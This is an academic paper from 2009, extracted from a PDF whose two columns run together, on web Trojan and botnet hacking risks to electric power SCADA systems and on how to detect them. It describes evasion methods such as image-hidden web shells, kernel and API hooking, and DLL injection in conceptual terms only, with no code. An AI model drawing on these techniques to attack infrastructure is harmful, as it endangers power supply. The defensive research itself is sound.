You are on page 1of 5

2009 International Conference on Web Information Systems and Mining

Hacking Risk Analysis of Web Trojan in Electric Power System

Yong Wang1,2 Dawu Gu1 Jianping Xu2 Haizhou Du2

1. Dept. of computer Science and Engineering 2. Dept. of computer Science and Technology
Shanghai Jiao Tong University Shanghai University of Electric Power
Shanghai, China Shanghai, China

Abstract—The threat from web Trojan in electric power Further, this standard identifies communication and
systems (EPS) is complex, which perhaps infects computers, control recommendations and provides guidance on
damage SCADA system, or even cause electricity fail. The considerations that will have to be addressed for such DR
paper presents the potential Trojan attack risks of EPS by interconnections. The network control center in one AEPS
analyzing the security architecture of power systems, such as domain operates as an administrator of all its local EPS
firewall, intrusion detection system and intrusion prevention domains and communicates with users in other AEPS
system. The paper analyzed some possible attack methods domains. The International Electro technical Commission
from web Trojan and Botnet. In order to find or track the (IEC) has recently published a substation automation system
possible Trojan attacks, the detection and defense methods in
communication standard - IEC61850 [1]. The SCADA and
virtual power system surroundings, such as web-based SCADA
system, VMware station, honeynet, anti-Trojan software and
AEPS both need computers to control EPS in different
operation system security, are presented. networks. Trojan can now control remote computers without
detection of anti-virus software and firewall. Once Trojan
Keywords-power system; security; Trojan; web attack EPS through cyber, the EPS will face to great
dangerous status. Vulnerability assessment is a requirement
of cyber security standards for electric power systems. It is
required to study the impact of a cyber attack on SCADA
Power systems security is very important issue. The systems [6].
remote control and electric transport system may give We will analysis the potential web Trojan attack risks of
hackers opportunities to intrude the systems by Cyber. EPS. Through analyzing the security architecture of power
Studies commissioned by the White House, FBI, and North systems by firewall, intrusion detection system and intrusion
American Electric Reliability Council (NERC) have prevention system, we will find out some possible attack
identified several factors that increase the probability of an methods from Trojan and Botnet in virtual power system
electronic, computer-based attack being launched against a surroundings, such as web-based SCANDA system,
substation, causing regional and possibly widespread power VMware station, Honeynet, anti-Trojan software and
outage[2,3]. Hacking risk from internet or in web server is operation system security.
very huge, though there are lots of Intrusion Detection
System and Firewalls in power systems. II. SECURITY ARCHITECTURE OF POWER SYSTEMS
Once Trojan or virus from cyber damage or change some
parameters of the Supervisory Control and Data Acquisition A. IEEE Standards of Power Systems Security
(SCADA), the electric power systems will suddenly collapse The IEEE defines electronic intrusions as: Entry into the
for self-safe function. SCADA does not implement adequate substation via telephone lines or other electronic-based
security measures in their products [10]. Power systems media for the manipulation or disturbance of electronic
consists of SCADA, electric power communication and devices. These devices include digital relays, fault recorders,
power data networks. SCADA is widely used in industrial equipment diagnostic packages, automation equipment,
infrastructures such as railways and electricity grid, and computers, programmable logic controllers, and
managed remotely using communication networks. communication interfaces.[1]
New SCADA system is designed in the power system of The IEEE standards show that during operational stage,
Montenegro with ICCP/TASE.2 and web-based real-time intrusions can affect the integrity of the electric power
electricity demand metering extensions [11]. IEEE P1547.6 supply and the reliability of the transmission and distribution
draft recommended practice for interconnecting distributed grid, if the intrusion results in power interruptions. Examples
resources with electric power systems distribution secondary include projectiles, poles, or kites that come in contact with
networks. This standard establishes recommended criteria, energized parts and electronic interference with relaying and
requirements and tests, and provides guidance for control circuits. Intruders have been known to open valves,
interconnection of distribution secondary network system push buttons, and operate circuit breakers, reclosers and
types of area electric power systems (AEPS) with distributed switches [1].
resources (DR) providing electric power generation in local
electric power systems (Local EPS).

978-0-7695-3817-4/09 $26.00 © 2009 IEEE 510

DOI 10.1109/WISM.2009.109
The IEEE 1547 family of standards gives utilities a attacks and an ever increasing number of attacks that use
technical framework to integrate power from diverse local blended threat vectors.
sources by considering such topics as operation, testing, SunScreen 3.1 firewall with the full-feature version is
interconnection, safety, maintenance, interoperability, design, used in power system. Which is a versatile stateful, packet-
engineering, installation and certification. IEEE 1547 filtering firewall that is used to control access, authenticate
standards are sponsored by the IEEE Standards Coordinating users, and encrypt network data and that operates in either
Committee 21 for Fuel Cells, Photovoltaics, Dispersed routing or stealth mode. The SunScreen 3.1 installation guide
Generation, and Energy Storage. covers installation overview and considerations, installing in
IEEE P1547.6, "Recommended Practice for routing mode with local and remote Administration Stations,
Interconnecting Distributed Resources with Electric Power installing in stealth mode, installing on Trusted Solaris,
Systems Distribution Secondary Networks", will overcome upgrading from the SunScreen EFS and SPF firewalls,
this deficiency by recommending technical criteria, converting from Checkpoint's Firewall1, removing the
requirements and tests relevant to the performance, operation, SunScreen software, command-line installation, and
testing, safety and maintenance for interconnecting DR on upgrading cryptographic modules.
such networks. It will consider the needs of local and area
electric power systems so as to serve owners, operators, D. Power Intrusion Detection and Intrusion Prevention
manufacturers, system integrators, regulators and other System
constituencies. Intrusion detection system (IDS) of power system can
detect virus attack and detect malicious code through
B. Web-based SCADA System network communications. Some antivirus software can be
IntegraXor is architect based on web technologies, installed in power system information area.
IntegraXor server is indeed a standard compliant web server The British Columbia Institute of Technology (BCIT) is
that added with HMI/SCADA requirements. A complete one of a few groups to track industrial cyber security
IntegraXor system always accomplished with at least another incidents. The BCIT Industrial security Incident Database
client, which runs on web browser, either locally or remotely. (ISID) contains information regarding security related
IntegraXor was developed based on open web standard as attacks on process control and industrial networked systems
much as possible, as advocated by World Wide Web [12].
Consortium, W3C, hence reduced the learning curve of the AVG Anti-Virus SBS protect for Microsoft Windows
system, especially when the documentation is widely Small Business Server network. The function includes
available for non-proprietary system. The real time alarms protection against viruses, worms, Trojans, against spyware,
and event log of simulate SCADA in web is as Figure 1: adware, identity-theft, against hidden threats rootkits, web
Shield, against malicious websites.
ZoneAlarm Pro provides you with advanced firewall
with identity and privacy protection against spyware, hackers
and identity thieves.
FortiGuard Antivirus Service prevents both new and
evolving virus, spyware and malware threats and
vulnerabilities from gaining access to your network and its
valuable applications or data assets by preventing and
responding to today's fast-spreading attacks. FortiGuard
Antivirus Service employs the most advanced virus, spyware,
and heuristic detection engines to provide comprehensive
Figure 1. Real time alarms and event log of simulate SCADA in web. protection against all the content level threats.
Intrusion Prevention Service (IPS) of FortiGuard
provides alerts based on a customizable database of more
C. Firewall of Power Systems than 4000 known attack signatures. This enables FortiGate
The UK government’s National Infrastructure Security Security Systems to stop attacks that evade conventional
Coordination Center (NISCC) recently released its host-based antivirus systems, and provides immediate
guidelines for effective use of firewalls in SCADA networks response to fast spreading threats. Fortinet 's worldwide IPS
(NISCC, 2005) [5]. Firewall of power systems can detect engineering teams "follow the sun" allowing Fortinet to
network communication protocol, Denial of Service (DOS) provide customers with real-time attack signatures. Using the
attack and other attacks. Some firewall equipments are used global FortiGuard Distribution Network, FortiGate systems
in EPS. stop the most damaging attacks at the network border
The FortiGate-5000 Series addresses this problem by regardless of whether the network is a wired, wireless,
tightly integrating multi-threat protection into a purpose-built partner extranet or branch office network connection.
platform to effectively block today’s file-based threats and Furthermore Fortinet's unique technology also supports
network-based threats. Examples of critical threats that are behavior-based heuristics adding valuable recognition
blocked by the FortiGate include: viruses, Trojans, worms, capabilities beyond simply matching content against known
phishing schemes, intrusion attempts, denial of service (DoS) signatures.

III. POSSIBLE ATTACK METHODS OF POWER SYSTEM unauthorized access to or from a private network. Firewalls
can be implemented in both hardware and software, or a
A. Possible Hacking Vulnerabilities of Power Systems combination of both. Firewalls are frequently used to prevent
Paul w. Oman research on the power system security of unauthorized Internet users from accessing private networks
possible attacks from internet and defend tools. Portions of connected to the Internet, especially intranets. All messages
his work were funded by the U.S. Department of Commerce entering or leaving the intranet pass through the firewall,
National Institute of Standards and Technology Critical which examines each message and blocks those that do not
Infrastructure Protection Grant. The Figure 2 is shown in his meet the specified security criteria.
paper. Trojan horse, at first glance will appear to be useful
software but will actually do damage once installed or run on
your computer. Bifrost would bypass many software
firewalls back then, and now being better at bypassing
Web shell Trojan can hide their server in any picture.
Once the picture with Trojan was upload the web server, the
hacker can get administrator privilege by improve privilege
tools by the picture. The web Trojan can control the web
server as their own computer, such as download files, upload
files, record password even format the server disk. They can
cause serious damage by deleting files and destroying
information on your system.
Trojans in local network can download virus from
outside web. Once one computer is hacked, all the other
computers in local network will face on hacking risk.
Figure 2. Electronic access vulnerabilities[4].
C. Trojan anti-Intrusion detection system methods
1. Modem access via telecommunications providers.
Firewalls work well in conjunction with Intrusion
2. Public network access via the Internet.
Detection Systems (IDS). Similar to firewalls, the problem
3. Wireless network access.
with IDS for SCADA networks is that most commercial IDS
4. Long-run private network lines.
are not capable of monitoring SCADA protocols for
5. Leased network lines (e.g., ATM or Frame-Relay
suspicious behaviors (Pollet, 2002; Stamp et al., 2004) [5].
connections) using telecommunications providers. [4]
Current IDS technology is not suited to be widely deployed
We focus attention to electronic access and discussion
inside SCADA environment [6].
with anatomy of a cyber attack, like gaining access to the
Rootkits Trojan can hide its own process by inserting
inside of substation and changing settings. The web hacking
remote thread into other process, hook the interrupt descript
vulnerabilities of power systems is shown as Figure 3:
table (IDT) to change the interrupt. Besides the IDT hoking,
there are many kernel mode hooks such as system enter
hooks, system service dispatch table (SSDT) hooks, code
patching hooks, layered driver hooks and driver hooks [4].
The kernel lever IDT hooks Trojan threaten the operating
system security. The vista has better security rule than
Winxp, many rootkit Trojan can’t work properly under this
operating system. It dose not mean the system is perfect,
which still has lots of security bug.
Besides kernel hooks Trojan there are many user hooking
processes such as Import Address Table (IAT) hooking.
When an application uses a function in another binary, the
application must import the address of the function. Most
applications that use the Win32 API could pass through an
IAT, so the Trojan can use the IAT hooks technology.
Inline function hooks Trojan are much more powerful
than IAT hooks. They do not suffer from the problems
Figure 3. Web hacking vulnerabilities of power systems. associated with the binding time of the DLL.
Injecting DLL Trojan is more popular, which can use two
methods to inject. Injecting a DLL using Windows Hooks:
B. Firewall Hacking by Web Trojan
Applications receive event messages for many events in the
Firewall is an integrated collection of security measures computer that relate to the application. Injecting a DLL using
designed to prevent unauthorized electronic access to a Remote Threads: Another way to load your Rootkit DLL
networked computer system, designed to prevent

into the target process is to create a remote thread in that B. Virtual Intrusion Detection Architecture
process. Because we can’t test the Trojan in real network of
We test some hooks Trojans which can work in vista power system, so we had to build a virtual experimental
operating system, pass through IDS and control remote environment. The virtualization is a proven software
computers without detection of many virus software. It technology that can build the virtual power system.
seems that there are lots of things to do to enhance the VMware scales across hundreds of interconnected
security of operating system. physical computers and storage devices to form an entire
D. Distributed Deny of Service Attack of Botnet virtual infrastructure. You don’t need to assign servers,
storage, or network bandwidth permanently to each
Online criminals can use a virus to take control of large application. Instead, your hardware resources are
numbers of computers at a time, and turn them into dynamically allocated when and where they’re needed. In
"zombies" that can work together as a powerful "botnet" to VMware station, you need a minimum of two Network
perform malicious tasks. Botnets, which can control huge Interface Cards, one connected to the internal, Honeynet
number of zombie computers, can distribute spam e-mail, network and one connected to the external network or
spread viruses, attack other computers and servers, and internet. You need three cards if you want the ability for
commit other kinds of crime and fraud. According to a report remote management or remote logging, including the use of
from Russian-based Kaspersky Labs, botnets currently pose the Walleye interface.
the biggest threat to the Internet. The Honeynet Project is an international, non-profit
The computers that form a botnet can be programmed to research organization dedicated to improving the security of
redirect transmissions to a specific computer, such as a Web the Internet at no cost to the public. Honeywall CDROM is
site that can be closed down by having to handle too much primary high-interaction tool for capturing, control and
traffic - a distributed denial-of-service (DDoS) attack.
analyzing attacks. It creates an architecture that allows you to
Agobot3 is a modular IRC bot for Win32 or Linux. The deploy both low-interaction and high-interaction Honeypots,
Agobot family quickly grew larger than other bot families. but is designed primarily for high-interaction. Know Your
Other bots in the Agobot family are: Forbot, Phatbot, Urxbot, Enemy: Honeynets: the paper can help you familiarize with
Rxbot, Rbot. Agobot now has several thousand variants. The the concepts of a Honeynet, especially the risks and legal
majority of the development force behind Agobot is issues involved. The Web Interface is the interface to
targeting the Microsoft Windows platform; as a result the administering the Honeywall. It allows you to remotely
vast majority of the variants are not Linux compatible. In administrate your system and analyze the data collected by
fact the majority of modern Agobot strains must be built Honeynet from Trojan intrusion.
with Visual Studio due to its reliance on Visual Studio's
SDK and Processor Pack. C. Iris Capture Packets from SCADA Network
The web server in power systems needs to defense the Iris eEye Digital Security is committed to bringing
DDOS attack. Actually the risk of DDOS in power systems visibility and control over computer and application
is not as high as single Trojan. Because the EPS will deny vulnerabilities, and providing a means to mitigate attacks
any other IP range except their own IP range. The ARP before they compromise sensitive information or critical
Trojan would damage the whole power systems information computing devices.
web, even though only one computer is once hacked. The tools can capture web SCADA packets from the
IV. DETECTION AND DEFENSE METHODS IN VIRTUAL current network segment, decode many types of trace files
containing IP packets, reconstructs the TCP sessions and
shows the Emails, web pages, ftp sessions and everything
that goes unencrypted in your network. Iris lets you search
A. Virtual SCADA
for certain words through captured sessions (web pages,
With the recent development of industrial computing emails, instant messages, etc) .
systems and human machine interface software packages, With Iris tools you can Log Network Wide Foreign
power systems research and development engineers ceased Connection Attempts. Iris can watch over your office and
the opportunity to come up with virtual simulation tools to alarm you when someone from the outside tries to connect to
emulate the operation of power systems. The paper describes your computers. The details are as Figure 4:
the development of a virtual SCADA (V-SCADA) system
tool for IDS test [9]. PC based simulator for SCADA system
which can be used for analysis of distribution networks. The
system consists of one PC representing the master station
connected through a physical RS 232 link to another PC,
which represents the RTU networks. The master station is
equipped with all standard SCADA modules such as network
analysis functions, data acquisition applications,
communication protocols and HMI. The RTU station
simulates field data acquisition and data transfer to the Figure 4. Capture packets from SCADA.
master station [8].

D. Web Trojan Hacking Detection control remote computers without detection of many virus
Web Trojan hacking detection of power systems is software. The Trojan hacking risk exist in power systems. It
compost of four components, analysis of power systems seems that there are lots of things to do to enhance the
safety devices features, analysis of hiding features of Trojan, security of power system.
analysis of intrude method of Trojan and intrusion detection ACKNOWLEDGMENT
in power system.
Power systems safety devices have two kinds of features, The paper is supported by National hi-tech research and
read features and write features. Read features stands the development project No.2006AA01Z405. Supported by
information from SCADA to outside. Write features stand Shanghai Postdoctoral Scientific Program (No.08R214131).
the information from outside to SCADA. Supported Innovation Program of Shanghai Municipal
Hiding features of Trojan includes process hiding, files Education Commission (No. 09YZ346).
hiding, port hiding and so on. The intrusion methods of
Trojan are anti virus detection and firewall detection in
power system. REFERENCES
After analysis three features, the last component is [1] IEEE Power Engineering Society, IEEE Standard 1402-2000: IEEE
intrusion detection, which is composed of memory detection, Guide for Electric Power Substation Physical and Electronic Security,
IEEE, New York, NY, April 4, 2000.
files detection and behavior detection. Web Trojan hacking
[2] Paul Oman, Edmund O. Schweitzer, III, and Jeff Roberts,
detection architecture is as Figure 5: “Safeguarding IEDS, substations, and SCADA systems against
electronic intrusions” , pp. 1-18.
[3] Paul W. Oman, Allen D. Risley, Jeff Roberts, and Edmund O.
Schweitzer, III, “Attack and defend tools for remotely accessible
control and protection equipment in electric power systems”, pp.1-26.
[4] Paul Oman and Edmund O. Schweitzer, III and Deborah Frincke,
“Concerns about intrusions into remotely accessible substion
controllers and SCADA systems”, pp.1-16.
[5] Vinay M. Igure, Sean A. Laughter, and Ronald D. Williams,
“Security issues in SCADA networks” , computers & security 25
(2006), pp.498-506.
[6] Chee-Wooi Ten, Chen-Ching Liu and Manimaran G., “Vulnerability
assessment of cybersecurity for SCADA systems power systems”,
IEEE Transactions on Volume 23, Issue 4, Nov. 2008 pp.1836-1846.
[7] Verba, J., Milvich, M., “Idaho national laboratory supervisory control
and data acquisition intrusion detection system (SCADA IDS)”,
Technologies for Homeland Security, 2008 IEEE Conference on 12-
13 May 2008 , pp.469-473.
[8] Awad, M., Ibrahim, A.I., “PC-Based SCADA simulator for
distribution system analysis”, Innovations in Information Technology,
2007. Innovations '07, 4th International Conference on18-20 Nov.
2007, pp.332-337.
Figure 5. Web Trojan hacking detection of power systems. [9] Darwish, K.W., Al Ali, A.R. and Dhaouadi, R., “Virtual SCADA
simulation system for power substation innovations in information
technology”, 2007 Innovations '07. 4th International Conference on
V. DISCUSSION 18-20 Nov. 2007 , pp.:322-326.
[10] Chikuni, E., Dondo, M., “Investigating the security of electrical
We have analysis the potential web Trojan attack risks of power systems SCADA” ,AFRICON 2007 26-28 Sept. 2007 ,pp.1-7.
EPS through analyzing the security architecture of power [11] Stojkovic, B., Vukasovic, M., “new SCADA system design in the
systems by firewall, intrusion detection system and intrusion power system of Montenegro - ICCP/TASE.2 and web-based real-
prevention system. We find out some possible attack time electricity demand metering extensions”, Power Systems
methods from Trojan and Botnet in virtual power system Conference and Exposition, 2006. PSCE '06. 2006 IEEE PES ct. 29
surroundings, such as web-based SCANDA system, 2006-Nov. 1 2006 pp.2194 - 2199
VMware station, Honeynet, anti-trojan software and [12] Creery, A.; Byres, E.J., “Industrial cyber security for power system
and SCADA networks”, Petroleum and Chemical Industry
operation system security. Conference, 2005. Industry Applications Society 52nd Annual 12-14
We test some hooks Trojans which can work in windows Sept. 2005, pp.:303-309.
xp and vista operating system, pass through firewall and